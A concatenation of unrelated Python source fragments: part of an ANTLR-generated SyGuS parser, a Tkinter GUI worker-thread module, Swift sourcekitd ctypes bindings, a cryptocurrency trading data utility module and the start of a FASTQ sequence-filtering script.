parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def symbolPlusTail(self): return self.getTypedRuleContext(SygusParser.SymbolPlusTailContext,0) def getRuleIndex(self): return SygusParser.RULE_symbolPlus def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterSymbolPlus" ): listener.enterSymbolPlus(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitSymbolPlus" ): listener.exitSymbolPlus(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitSymbolPlus" ): return visitor.visitSymbolPlus(self) else: return visitor.visitChildren(self) def symbolPlus(self): localctx = SygusParser.SymbolPlusContext(self, self._ctx, self.state) self.enterRule(localctx, 32, self.RULE_symbolPlus) try: self.enterOuterAlt(localctx, 1) self.state = 195 self.symbol() self.state = 196 self.symbolPlusTail() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SymbolPlusTailContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def symbolPlusTail(self): return self.getTypedRuleContext(SygusParser.SymbolPlusTailContext,0) def getRuleIndex(self): return SygusParser.RULE_symbolPlusTail def enterRule(self, listener:ParseTreeListener): if
# (Note the window is not actually displayed until someone calls # our go() method.) inst.title(title) # Set the window width and height. inst.config(width=width, height=height) # Raise the guiapp.mainWinExists flag to announce that the main # window exists now - in case some other thread has been hanging # around just waiting for that to happen. mainWinExists.rise() # Ask TkInter to have the main window check the guibot worklist # for new things to do as soon as the GUI mainloop is running # & idle (waiting for events). inst.after_idle(inst.check_worklist) # End _MainWin.__init__() #--------------------------------------------- #----------------------------------------------------------------- # go() [instance public method] # # Start the TkInter GUI application's main loop, if # it's not already started. This method can be called # from any thread, but it always delegates its work to # the guibot worker thread, because TkInter doesn't # support being called from within multiple threads. def go(inst): global lock, guibot, mainloopRunning if ambot(): # If we're already in the guibot thread, # Raise the flag to announce the mainloop is running. if not mainloopRunning.rise(): # If it wasn't running already, logger.debug("_MainWin.go(): About to enter TkInter main loop...") # Go ahead and start the mainloop, but catch any exceptions. try: inst.mainloop() # Start the TkInter main loop. # Here's an Exception we may throw sometimes in our callbacks # when our thread is being asked to exit. However, I'm not sure # if this exception will actually make it through TkInter. except ExitingByRequest: logger.debug("_MainWin.go(): Exited from TkInter mainloop by request.") raise # Pass the exception on to our caller (probably Worker.run()). except: # If TkInter gives us an exception, logger.exception("_MainWin.go(): TkInter mainloop exited with an exception.") raise # Pass the exception on to our caller (probably Worker.run()). finally: # If we ever exit the main loop, logger.debug("_MainWin.go(): in finally clause after TkInter main loop") mainloopRunning.fall() # Turn off mainloopRunning flag. logger.debug("_MainWin.go(): About to destroy main window") inst.destroy() # Delete the _MainWin object (& all its descendant widgets). logger.debug("_MainWin.go(): Destroyed main window") logger.debug("_MainWin.go(): guibot's task of running the TkInter mainloop is now complete.") else: logger.debug("_MainWin.go(): TkInter mainloop is already running; request ignored.") # If the main loop was already running, we get here and just # do nothing & return. Consider the "go" a success by default. # Or we might get here because of an exception. Either way, # the "go" task is now completed. logger.debug("_MainWin.go(): Returning from _MainWin.go().") else: # We're in the wrong thread... guibot.do(inst.go) # Re-call this method, in the background, # in the guibot thread. (Don't wait for it to finish!) # End _MainWin.go(). #--------------------------- #------------------------------------------------------------------ # check_worklist() [instance private method] # # This method should only be called from within the # guibot thread. When guibot is in the TkInter mainloop, # it arranges for TkInter to call this callback # periodically, to ensure that guibot can still check for # more tasks to do while within the context of the fact # that it is already in the middle of doing the "go" # (run mainloop) task). Needless to say, all tasks done # by the guibot within here need to finish quickly, so # that the GUI don't become unresponsive. def check_worklist(self): global guibot if not ambot(): raise WrongThread(("[%s] " % current_thread().name) + " guiapp._MainWin.check_worklist():\n\tCalling this " + "method directly from threads other than " + ("guibot (%s)\n\tis not supported. Use " % guibot.name) + "guigo() instead to start guibot's TkInter mainloop processing.") # If we get here, we're in the guibot thread. # Try doing any tasks that might be waiting in our worklist queue. # (But catch exceptions while doing so.) try: # The point of this loop is that if multiple tasks for us # got queued up since the last time we woke up, we go ahead # and do them all now (clear the queue) rather than going # to sleep for another tenth of a second after each item. # This loop is only exited when do1job() throws an Empty # exception (which it can do in nonblocking mode). while True: # If someone asked us to exit, comply by throwing ExitingByRequest. guibot.check_exitflag() # Retrieve and do 1 item from our queue, if available. try: guibot.do1job(block=False) # block=False says: if worklist is empty, don't wait for tasks. except WarningException: logger.warn("_MainWin.check_worklist(): guibot job exited by throwing a WARNING-level exception; ignoring...") #\The idea here being that mere warning-level exceptions shouldn't prevent processing of subsequent jobs. # Commented out b/c this happens too often to be worth including in debug output. # logger.debug('After do1job, queue size = %d' % guibot.todo.qsize()) # Make sure our main window hasn't disappeared; if so, quit. if self.destroyed: # Did that task result in the window getting torn down? # There's no need to run the TkInter mainloop any more if the # main window (and therefore all other windows?) no longer exist. logger.debug("_MainWin.check_worklist(): Widget destroyed out from under us; quitting main loop.") self.quit() # Tells TkInter to quit its main loop. return # Return from this routine without scheduling an "after" callback. # In between guibot tasks, let TkInter check for common events # like resize, etc., for better overall responsiveness of the GUI. self.update_idletasks() # If worklist is empty now, there's nothing else to do; just return. except Empty: # Is the worklist queue empty? pass # That's our normal way out of the loop. # If someone asked the guibot to exit, then exit TkInter's mainloop also. except ExitingByRequest: # Are we exiting check_worklist() b/c someone asked guibot to exit? self.quit() # Then, tell TkInter to quit its main loop as well. # Don't re-raise because TkInter may print an unwanted traceback for this exception. return # This avoids rescheduling callback to this method. except: # Did some other exception happen? logger.exception("_MainWin.check_worklist(): A guibot job threw an exception...") #-We don't re-raise the exception here, because we want the # last line of this function (rescheduling this callback) to # still be executed. If we didn't do that, guibot would get # stuck in the mainloop and be unable to execute any more tasks. # One alternative would be to quit the whole mainloop here, # but that might be a little too drastic. (Really, we should # look for fatal vs. non-fatal classes of exceptions, and # respond accordingly.) # This is commented out because it seemed too drastic. # print("_MainWin.check_worklist(): A guibot job threw an exception...",file=sys.stderr) # traceback.print_exc(file=sys.stderr) # self.destroy() # Destroy _MainWin widget and all subwidgets. Bad idea to do it this early? # raise # Re-raise that exception. Or does TkInter just swallow it up? # If we exited the above queue-consumption loop normally, or because of an # un-handled exception, then ask TkInter to call this routine again in not # less than 100 milliseconds. This effectively gives us our own main loop, # inside of TkInter's mainloop. The delay prevents excessive polling while # remaining reasonably responsive. self.after(100, self.check_worklist) # 100 ms = 1/10th sec. Decently responsive. # End _MainWin.check_worklist(). #---------------------------------------- #--------------------------------------------------------------------- # destroy() [instance public method] # # This overrides the default destroy method from our # superclass Tk. (However, we call it internally.) # # Basically, we just set some flags to track our state. # def destroy(this): logger.debug("%s in _MainWin.destroy()..." % current_thread()) #real stdout # We also need to kill the guiapp thread (or at least # clear out its event queue, since those events probably # all refer to widgets that are being destroyed) but I'm # not quite sure how/when to best do this. with lock: if this.destroyed: logger.warn("_MainWin.destroy(): Main window has already been destroyed; ignoring request.") return theMainWin
<reponame>ghostbar/swift-lang.deb # capi.py - sourcekitd Python Bindings -*- python -*- # # This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See http://swift.org/LICENSE.txt for license information # See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors from ctypes import ( CFUNCTYPE, POINTER, Structure, addressof, c_bool, c_char_p, c_int, c_int64, c_size_t, c_uint64, c_void_p, cdll, py_object, string_at, ) # ctypes doesn't implicitly convert c_void_p to the appropriate wrapper # object. This is a problem, because it means that from_parameter will see an # integer and pass the wrong value on platforms where int != void*. Work around # this by marshalling object arguments as void**. c_object_p = POINTER(c_void_p) callbacks = {} ### Structures and Utility Classes ### class CachedProperty(object): """Decorator that lazy-loads the value of a property. The first time the property is accessed, the original property function is executed. The value it returns is set as the new value of that instance's property, replacing the original method. """ def __init__(self, wrapped): self.wrapped = wrapped try: self.__doc__ = wrapped.__doc__ except: pass def __get__(self, instance, instance_type=None): if instance is None: return self value = self.wrapped(instance) setattr(instance, self.wrapped.__name__, value) return value class Object(object): def __init__(self, obj): if isinstance(obj, Object): self._obj = conf.lib.sourcekitd_request_retain(obj) elif isinstance(obj, (int,long,bool)): self._obj = conf.lib.sourcekitd_request_int64_create(obj) elif isinstance(obj, str): self._obj = conf.lib.sourcekitd_request_string_create(obj) elif isinstance(obj, UIdent): self._obj = conf.lib.sourcekitd_request_uid_create(obj) elif isinstance(obj, dict): self._obj = conf.lib.sourcekitd_request_dictionary_create( POINTER(c_void_p)(), POINTER(c_void_p)(), 0) self._as_parameter_ = self._obj for k,v in obj.iteritems(): conf.lib.sourcekitd_request_dictionary_set_value(self, UIdent(k), Object(v)) elif isinstance(obj, (list,tuple)): self._obj = conf.lib.sourcekitd_request_array_create( POINTER(c_void_p)(), 0) self._as_parameter_ = self._obj for v in obj: conf.lib.sourcekitd_request_array_set_value(self, -1, Object(v)) else: raise ValueError("wrong init parameter (%s)" % type(obj)) self._as_parameter_ = self._obj def from_param(obj): return obj._as_parameter_ def __del__(self): if self._obj: conf.lib.sourcekitd_request_release(self) def __repr__(self): ptr = conf.lib.sourcekitd_request_description_copy(self) s = string_at(ptr) conf.free(ptr) return s class Response(object): def __init__(self, obj): if isinstance(obj, c_object_p): self._obj = self._as_parameter_ = obj else: raise ValueError("wrong init parameter (%s)" % type(obj)) def get_payload(self): return conf.lib.sourcekitd_response_get_value(self) def from_param(obj): return obj._as_parameter_ def __del__(self): if self._obj: conf.lib.sourcekitd_response_dispose(self) def __repr__(self): ptr = conf.lib.sourcekitd_response_description_copy(self) s = string_at(ptr) conf.free(ptr) return s class UIdent(object): def __init__(self, obj): if isinstance(obj, c_object_p): self._obj = obj elif isinstance(obj, UIdent): self._obj = obj._obj elif isinstance(obj, str): self._obj = conf.lib.sourcekitd_uid_get_from_cstr(obj) else: raise ValueError("wrong init parameter (%s)" % type(obj)) self._as_parameter_ = self._obj def __str__(self): return conf.lib.sourcekitd_uid_get_string_ptr(self) def from_param(obj): return obj._as_parameter_ def __repr__(self): return "UIdent('%s')" % self.__str__() def _ptr(self): return addressof(self._obj.contents) def __eq__(self, other): return self._ptr() == UIdent(other)._ptr() def __ne__(self, other): return self._ptr() != UIdent(other)._ptr() def __hash__(self): return hash(self._ptr()) class ErrorKind(object): """ Describes the kind of type. """ # The unique kind objects, indexed by id. _kinds = [] _name_map = None def __init__(self, value): if value >= len(ErrorKind._kinds): ErrorKind._kinds += [None] * (value - len(ErrorKind._kinds) + 1) if ErrorKind._kinds[value] is not None: raise ValueError('ErrorKind already loaded') self.value = value ErrorKind._kinds[value] = self ErrorKind._name_map = None def from_param(self): return self.value @property def name(self): """Get the enumeration name of this error kind.""" if self._name_map is None: self._name_map = {} for key,value in ErrorKind.__dict__.items(): if isinstance(value,ErrorKind): self._name_map[value] = key return self._name_map[self] @staticmethod def from_id(id): if id >= len(ErrorKind._kinds) or ErrorKind._kinds[id] is None: raise ValueError('Unknown type kind {}'.format(id)) return ErrorKind._kinds[id] def __repr__(self): return 'ErrorKind.%s' % (self.name,) ErrorKind.CONNECTION_INTERRUPTED = ErrorKind(1) ErrorKind.REQUEST_INVALID = ErrorKind(2) ErrorKind.REQUEST_FAILED = ErrorKind(3) ErrorKind.REQUEST_CANCELLED = ErrorKind(4) class Variant(Structure): _fields_ = [ ("data", c_uint64 * 3)] def to_python_object(self): var_ty = conf.lib.sourcekitd_variant_get_type(self) if var_ty == VariantType.NULL: return None elif var_ty == VariantType.DICTIONARY: return self.to_python_dictionary() elif var_ty == VariantType.ARRAY: return self.to_python_array() elif var_ty == VariantType.INT64: return conf.lib.sourcekitd_variant_int64_get_value(self) elif var_ty == VariantType.STRING: return conf.lib.sourcekitd_variant_string_get_ptr(self) elif var_ty == VariantType.UID: return UIdent(conf.lib.sourcekitd_variant_uid_get_value(self)) else: assert(var_ty == VariantType.BOOL) return conf.lib.sourcekitd_variant_bool_get_value(self) def to_python_array(self): def applier(index, value, arr): arr.append(value.to_python_object()) return 1 # continue arr = [] conf.lib.sourcekitd_variant_array_apply_f(self, callbacks['array_applier'](applier), arr) return arr def to_python_dictionary(self): def applier(cobj, value, d): d[str(UIdent(cobj))] = value.to_python_object() return 1 # continue d = {} conf.lib.sourcekitd_variant_dictionary_apply_f(self, callbacks['dictionary_applier'](applier), d) return d class VariantType(object): """ Describes the kind of type. """ # The unique kind objects, indexed by id. _kinds = [] _name_map = None def __init__(self, value): if value >= len(VariantType._kinds): VariantType._kinds += [None] * (value - len(VariantType._kinds) + 1) if VariantType._kinds[value] is not None: raise ValueError('VariantType already loaded') self.value = value VariantType._kinds[value] = self VariantType._name_map = None def from_param(self): return self.value @property def name(self): """Get the enumeration name of this variant type.""" if self._name_map is None: self._name_map = {} for key,value in VariantType.__dict__.items(): if isinstance(value,VariantType): self._name_map[value] = key return self._name_map[self] @staticmethod def from_id(id): if id >= len(VariantType._kinds) or VariantType._kinds[id] is None: raise ValueError('Unknown type kind {}'.format(id)) return VariantType._kinds[id] def __repr__(self): return 'VariantType.%s' % (self.name,) VariantType.NULL = VariantType(0) VariantType.DICTIONARY = VariantType(1) VariantType.ARRAY = VariantType(2) VariantType.INT64 = VariantType(3) VariantType.STRING = VariantType(4) VariantType.UID = VariantType(5) VariantType.BOOL = VariantType(6) # Now comes the plumbing to hook up the C library. # Register callback types in common container. callbacks['array_applier'] = CFUNCTYPE(c_int, c_size_t, Variant, py_object) callbacks['dictionary_applier'] = CFUNCTYPE(c_int, c_object_p, Variant, py_object) # Functions strictly alphabetical order. functionList = [ ("sourcekitd_cancel_request", [c_void_p]), ("sourcekitd_initialize", None), ("sourcekitd_request_array_create", [POINTER(c_object_p), c_size_t], c_object_p), ("sourcekitd_request_array_set_int64", [Object, c_size_t, c_int64]), ("sourcekitd_request_array_set_string", [Object, c_size_t, c_char_p]), ("sourcekitd_request_array_set_stringbuf", [Object, c_size_t, c_char_p, c_size_t]), ("sourcekitd_request_array_set_uid", [Object, c_size_t, UIdent]), ("sourcekitd_request_array_set_value", [Object, c_size_t, Object]), ("sourcekitd_request_create_from_yaml", [c_char_p, POINTER(c_char_p)], c_object_p), ("sourcekitd_request_description_copy", [Object], c_void_p), ("sourcekitd_request_description_dump", [Object]), ("sourcekitd_request_dictionary_create", [POINTER(c_object_p), POINTER(c_object_p), c_size_t], c_object_p), ("sourcekitd_request_dictionary_set_int64", [Object, UIdent, c_int64]), ("sourcekitd_request_dictionary_set_string", [Object, UIdent, c_char_p]), ("sourcekitd_request_dictionary_set_stringbuf", [Object, UIdent, c_char_p, c_size_t]), ("sourcekitd_request_dictionary_set_uid", [Object, UIdent, UIdent]), ("sourcekitd_request_dictionary_set_value", [Object, UIdent, Object]), ("sourcekitd_request_int64_create", [c_int64], c_object_p), ("sourcekitd_request_retain", [Object], c_object_p), ("sourcekitd_request_release", [Object]), ("sourcekitd_request_string_create", [c_char_p], c_object_p), ("sourcekitd_request_uid_create", [UIdent], c_object_p), ("sourcekitd_response_description_copy", [Response], c_char_p), ("sourcekitd_response_description_dump", [Response]), ("sourcekitd_response_description_dump_filedesc", [Response, c_int]), ("sourcekitd_response_dispose", [Response]), ("sourcekitd_response_error_get_description", [Response], c_char_p), ("sourcekitd_response_error_get_kind", [Response], ErrorKind.from_id), ("sourcekitd_response_get_value", [Response], Variant), ("sourcekitd_response_is_error", [Response], c_bool), # ("sourcekitd_send_request", ("sourcekitd_send_request_sync", [Object], c_object_p), # ("sourcekitd_set_interrupted_connection_handler", ("sourcekitd_shutdown", None), ("sourcekitd_uid_get_from_buf", [c_char_p, c_size_t], c_object_p), ("sourcekitd_uid_get_from_cstr", [c_char_p], c_object_p), ("sourcekitd_uid_get_length", [UIdent], c_size_t), ("sourcekitd_uid_get_string_ptr", [UIdent], c_char_p), ("sourcekitd_variant_array_apply_f", [Variant, callbacks['array_applier'], py_object], c_bool), ("sourcekitd_variant_array_get_bool", [Variant, c_size_t], c_bool), ("sourcekitd_variant_array_get_count", [Variant], c_size_t), ("sourcekitd_variant_array_get_int64", [Variant, c_size_t], c_int64), ("sourcekitd_variant_array_get_string", [Variant, c_size_t], c_char_p), ("sourcekitd_variant_array_get_uid", [Variant, c_size_t], c_object_p), ("sourcekitd_variant_array_get_value", [Variant, c_size_t], Variant), ("sourcekitd_variant_bool_get_value", [Variant], c_bool), ("sourcekitd_variant_dictionary_apply_f", [Variant, callbacks['dictionary_applier'], py_object], c_bool), ("sourcekitd_variant_dictionary_get_bool", [Variant, UIdent], c_bool), ("sourcekitd_variant_dictionary_get_int64", [Variant, UIdent], c_int64), ("sourcekitd_variant_dictionary_get_string", [Variant, UIdent], c_char_p), ("sourcekitd_variant_dictionary_get_value", [Variant, UIdent], Variant), ("sourcekitd_variant_dictionary_get_uid", [Variant, UIdent], c_object_p), ("sourcekitd_variant_get_type", [Variant], VariantType.from_id), ("sourcekitd_variant_string_get_length", [Variant], c_size_t), ("sourcekitd_variant_string_get_ptr", [Variant], c_char_p), ("sourcekitd_variant_int64_get_value", [Variant], c_int64), ("sourcekitd_variant_uid_get_value", [Variant], c_object_p), ] class LibsourcekitdError(Exception): def __init__(self, message): self.m = message def __str__(self): return self.m def register_function(lib, item, ignore_errors): # A function may not exist, if these bindings are used with an older or # incompatible version of sourcekitd. try: func = getattr(lib, item[0]) except AttributeError as e: msg = str(e) + ". Please ensure that your python bindings are "\ "compatible with your sourcekitd version." if ignore_errors: return raise LibsourcekitdError(msg) if len(item) >= 2: func.argtypes = item[1] if len(item) >= 3: func.restype = item[2] if len(item) == 4: func.errcheck = item[3] def register_functions(lib, ignore_errors): """Register function prototypes with a sourcekitd library instance. This must be called as part of library instantiation so Python knows how to call out to the shared library. """ def register(item): return register_function(lib, item, ignore_errors) map(register, functionList) class Config: library_path = None library_file = None loaded = False @staticmethod def set_library_path(path): """Set the path in which to search for sourcekitd""" if Config.loaded: raise Exception("library path must be set before before using " "any other functionalities in sourcekitd.") Config.library_path = path @staticmethod def set_library_file(filename): """Set the exact location of sourcekitd""" if Config.loaded: raise Exception("library file must be set before before using " "any other functionalities in sourcekitd.") Config.library_file = filename @CachedProperty def lib(self): lib = self.get_sourcekitd_library() register_functions(lib, False) Config.loaded = True return lib @CachedProperty def free(self): free = cdll.LoadLibrary('libc.dylib').free free.argtypes = [c_void_p] return free def get_filename(self): if Config.library_file: return Config.library_file import platform name = platform.system() if name == 'Darwin': # The XPC service cannot run via the bindings due to permissions issue. # file = 'sourcekitd.framework/sourcekitd' file = 'libsourcekitdInProc.dylib' elif name == 'Windows': file = 'sourcekitd.dll' else: file = 'sourcekitd.so' if Config.library_path: file = Config.library_path + '/' + file return file def get_sourcekitd_library(self): try: library = cdll.LoadLibrary(self.get_filename()) except OSError as e: msg = str(e) + ". To provide a path to sourcekitd use " \ "Config.set_library_path() or
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jan 7 21:43:26 2019 @author: tc """ # import numpy as np import pandas as pd from queue import Queue from datetime import datetime, timedelta import math from sklearn.utils import Bunch import numpy as np import sys from enum import Enum PICKLE_EXT = ".pydata" # pickle file extension JSON_EXT = ".json" # msgpack file extension MSG_EXT = ".msg" # msgpack file extension DT_FORMAT = "%Y-%m-%d_%Hh%Mm" FEE = 1/1000 # in per mille, transaction fee is 0.1% TRADE_SLIP = 0 # 1/1000 # in per mille, 0.1% trade slip BUY_THRESHOLD = 10/1000 # in per mille SELL_THRESHOLD = -5/1000 # in per mille VOL_BASE_PERIOD = "1D" CPC = "CPC" HOLD = "-" BUY = "buy" SELL = "sell" NA = "not assigned" TRAIN = "training" VAL = "validation" TEST = "test" TARGETS = {HOLD: 0, BUY: 1, SELL: 2} # dict with int encoding of target labels TARGET_NAMES = {0: HOLD, 1: BUY, 2: SELL} # dict with int encoding of targets TARGET_KEY = 5 LBL = {NA: 0, TRAIN: -1, VAL: -2, TEST: -3} QUOTE = "usdt" MANDATORY_STEPS = 2 # number of steps for the smallest class (in general BUY) SMALLER_16GB_RAM = True DATA_KEYS = ["open", "high", "low", "close", "volume"] # , "price" DATA_PATH = "" OTHER_PATH_PREFIX = "" DATA_PATH_PREFIX = "" HOME = "" BASES = [] TIME_AGGS = {} print(f"len BASES: {len(BASES)}") print(f"len TIME_AGGS: {len(TIME_AGGS)}") print(f"len DATA_PATH: {len(DATA_PATH)}") class Env(Enum): ubuntu = 1 osx = 2 floydhub = 3 colab = 4 class TestConf(Enum): test = 1 production = 2 def config_ok(): return len(DATA_PATH) > 0 def set_environment(test_conf, this_env): global HOME global DATA_PATH global OTHER_PATH_PREFIX global DATA_PATH_PREFIX global BASES global TIME_AGGS if this_env == Env.osx: HOME = "/Users/tc/" DATA_PATH_PREFIX = HOME + "crypto/" OTHER_PATH_PREFIX = HOME + "crypto/" elif this_env == Env.ubuntu: HOME = "/home/tor/" DATA_PATH_PREFIX = HOME + "crypto/" OTHER_PATH_PREFIX = HOME + "crypto/" elif this_env == Env.colab: HOME = "/content/gdrive/My Drive/" DATA_PATH_PREFIX = HOME OTHER_PATH_PREFIX = HOME assert(not test_conf) elif this_env == Env.floydhub: HOME = "" DATA_PATH_PREFIX = "/floyd/input/" OTHER_PATH_PREFIX = HOME assert(not test_conf) else: raise ValueError(f"configuration fault in this_env: {this_env}") if test_conf == TestConf.test: DATA_PATH = f"{DATA_PATH_PREFIX}TestFeatures/" # local execution TIME_AGGS = {1: 10, 5: 10, 15: 10, 60: 10, 4*60: 10, 24*60: 10} # BASES = ["xrp", "bnb", "eos"] # BASES = ["xrp", "eos"] BASES = ["xrp"] elif test_conf == TestConf.production: DATA_PATH = f"{DATA_PATH_PREFIX}Features/" BASES = ["xrp", "eos", "bnb", "btc", "eth", "neo", "ltc", "trx"] TIME_AGGS = {1: 10, 5: 10, 15: 10, 60: 10, 4*60: 10, 24*60: 10} else: raise ValueError(f"configuration fault in test_conf: {test_conf}") def sets_config_fname(): cfname = DATA_PATH + "target_5_sets_split.config" return cfname def timestr(ts=None): if ts is None: return datetime.now().strftime(DT_FORMAT) else: return pd.to_datetime(ts).strftime(DT_FORMAT) def time_in_index(dataframe_with_timeseriesindex, tic): return True in dataframe_with_timeseriesindex.index.isin([tic]) def sym_of_base(base): s = f"{base.lower()}_{QUOTE}" return s def base_of_sym(sym): s = sym.lower() q = QUOTE.lower() ix = s.find(q) if ix < 0: raise ValueError(f"base_of_sym {sym}: no quote {QUOTE} found") if ix == 0: raise ValueError(f"base_of_sym {sym}: no base found") if not s[ix-1].isalpha(): # seperation character found ix -= 1 b = s[0:ix] return b class NoSubsetWarning(Exception): pass def targets_to_features(tfv_ta_df, target_df): """Extracts a sample subset with targets and features of a specific time aggregation based on given targets. target_df and tfv_ta_df both have to share the same index basis. The index of target_df shall be a subset of tfv_ta_df. """ df = tfv_ta_df[tfv_ta_df.index.isin(target_df.index)] # check compatibility of target_df.sym with d = len(target_df.index.difference(tfv_ta_df.index)) c = len(df) b = len(target_df) p = len(tfv_ta_df) if d > 0: raise NoSubsetWarning(f"subset({b}) with {c}/{d} rows that are/are not in superset({p})") return df def save_asset_dataframe(df, path, cur_pair): # "saves the object via msgpack" # cur_pair = cur_pair.replace("/", "_") fname = path + cur_pair + "_DataFrame.msg" print("{}: writing {} {} tics ({} - {})".format( datetime.now().strftime(DT_FORMAT), cur_pair, len(df), df.index[0].strftime(DT_FORMAT), df.index[len(df)-1].strftime(DT_FORMAT))) df.to_msgpack(fname) def load_asset_dataframefile(fname): # "loads the object via msgpack" df = None try: df = pd.read_msgpack(fname) print("{}: load {} {} tics ({} - {})".format( datetime.now().strftime(DT_FORMAT), fname, len(df), df.index[0].strftime(DT_FORMAT), df.index[len(df)-1].strftime(DT_FORMAT))) except IOError: print(f"{timestr()} load_asset_dataframefile ERROR: cannot load {fname}") except ValueError: return None return df def dfdescribe(desc, df): print(desc) print(df.describe()) print(df.head()) print(df.tail()) def merge_asset_dataframe(path, base): # "loads the object via msgpack" fname = path + "btc_usdt" + "_DataFrame.msg" btcusdt = load_asset_dataframefile(fname) if base != "btc": fname = path + base + "_btc" + "_DataFrame.msg" basebtc = load_asset_dataframefile(fname) dfdescribe(f"{base}-btc", basebtc) fname = path + base + "_usdt" + "_DataFrame.msg" baseusdt = load_asset_dataframefile(fname) dfdescribe(f"{base}-usdt", baseusdt) if (baseusdt.index[0] <= basebtc.index[0]) or (baseusdt.index[0] <= btcusdt.index[0]): basemerged = baseusdt else: basebtc = basebtc[basebtc.index.isin(btcusdt.index)] basemerged = pd.DataFrame(btcusdt) basemerged = basemerged[basemerged.index.isin(basebtc.index)] for key in DATA_KEYS: if key != "volume": basemerged[key] = basebtc[key] * btcusdt[key] basemerged["volume"] = basebtc.volume dfdescribe(f"{base}-btc-usdt", basemerged) baseusdt = baseusdt[baseusdt.index.isin(basemerged.index)] assert not baseusdt.empty basemerged.loc[baseusdt.index] = baseusdt[:] # take values of cusdt where available else: basemerged = btcusdt dfdescribe(f"{base}-merged", basemerged) save_asset_dataframe(basemerged, DATA_PATH, base + "usdt") return basemerged def load_asset_dataframe(path, base): # "loads the object via msgpack" fname = path + base + f"_{QUOTE}" + "_DataFrame.msg" dfbu = load_asset_dataframefile(fname) if dfbu is None: raise MissingHistoryData("Cannot load {}".format(fname)) return dfbu def report_setsize(setname, df): hc = len(df[df.target == TARGETS[HOLD]]) sc = len(df[df.target == TARGETS[SELL]]) bc = len(df[df.target == TARGETS[BUY]]) tc = hc + sc + bc print(f"buy {bc} sell {sc} hold {hc} total {tc} on {setname}") def str_setsize(df): hc = len(df[df.target == TARGETS[HOLD]]) sc = len(df[df.target == TARGETS[SELL]]) bc = len(df[df.target == TARGETS[BUY]]) tc = hc + sc + bc return f"buy {bc} sell {sc} hold {hc} total {tc}" def smallest_dict_key(thisdict): smallest_key = 5000 for k in thisdict: if isinstance(k, int): if k < smallest_key: smallest_key = k assert smallest_key != 5000, "no int in dict keys" return smallest_key def to_scikitlearn(df, np_data=None, descr=None): """Load and return the crypto dataset (classification). """ fn_list = list(df.keys()) fn_list.remove("target") fn_list.remove("close") if np_data is None: # data = df[fn_list].to_numpy(dtype=float) # incompatible with pandas 0.19.2 data = df[fn_list].values else: data = np_data # target = df["target"].to_numpy(dtype=float) # incompatible with pandas 0.19.2 # tics = df.index.to_numpy(dtype=np.datetime64) # incompatible with pandas 0.19.2 target = df["target"].values # compatible with pandas 0.19.2 close = df["close"].values # compatible with pandas 0.19.2 tics = df.index.values # compatible with pandas 0.19.2 feature_names = np.array(fn_list) target_names = np.array(TARGETS.keys()) if descr is None: descr = "missing description" return Bunch(data=data, target=target, close=close, target_names=target_names, tics=tics, descr=descr, feature_names=feature_names) class Tee(object): def __init__(self, name, mode="w"): self.file = open(name, mode) self.stdout = sys.stdout sys.stdout = self def close(self): if self.stdout is not None: sys.stdout = self.stdout self.stdout = None if self.file is not None: self.file.close() self.file = None def write(self, data): self.file.write(data) self.stdout.write(data) def flush(self): self.file.flush() self.stdout.flush() def __del__(self): self.close() class MissingHistoryData(Exception): pass class TargetsFeatures: """Receives a dict of currency pairs with associated minute candle data and transforms it into a dict of currency pairs with associated dicts of time_aggregations features. The time aggregation is the dict key with one special key 'CPC' that provides the summary targets Attributes ---------- time_aggregations: dict with required time aggregation keys and associated number of periods that shall be compiled in a corresponding feature vector minute_data: currency pair (as keys) dict of input minute data as corresponding pandas DataFrame To Do ===== buy - sell signals: now reduced to first signal rolling shall allow a richer buy - sell signalling that are simply mapped on a common timeline where the optimization problem is addressed >>> read dataframe from file >>> concatenate features to full feature vector and write it as file abbreviatons and terms ====================== time aggregation - time period for which features are derived, e.g. open, close, high, low. In this context different time aggregations are used to low pass filter high frequent volatility. cpc - currency pair classifier """ def __init__(self, base, quote): """Receives the key attributes for feature generation aggregations: dict with required time aggregation keys and associated number of periods that shall be compiled in a corresponding feature vector target_key: has to be a key of aggregations. Targets are only calculated for that target_key """ assert(config_ok()) self.base = base self.quote = quote self.minute_data = None self.minimum_minute_data = 0 self.vec = None self.target_key = TARGET_KEY self.minimum_minute_df_len = 0 for agg in TIME_AGGS: assert isinstance(agg, int) value = TIME_AGGS[agg] assert isinstance(value, int) minlen = agg * value if self.minimum_minute_df_len < minlen: self.minimum_minute_df_len =
<filename>src/fastqfilter.py #! /usr/bin/env python3 # Copyright <NAME>, 2015. www.sovic.org # # A script that takes an input FASTA/FASTQ file and performs various methods # of filtering on it. Examples include: selecting sequences that contain certain # strings in their header, and others. import re import os import sys import fastqparser import numpy as np import random import operator; def filter_seqs_by_header(input_fastq_path, header_patterns_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); try: fp_filter = open(header_patterns_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % header_patterns_path); exit(0); filter_headers = fp_filter.readlines(); filter_headers = [line.strip() for line in filter_headers if (len(line.strip()) > 0)]; fp_filter.close(); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; for filter_header in filter_headers: if ((filter_header[-1] == ';' and filter_header[0:-1].lower() == header.lower()) or (filter_header[-1] != ';' and filter_header.lower() in header.lower())): num_matches += 1; sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); break; sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_read_id(input_fastq_path, read_id_path, out_fastq_path, fp_out): try: fp_in = 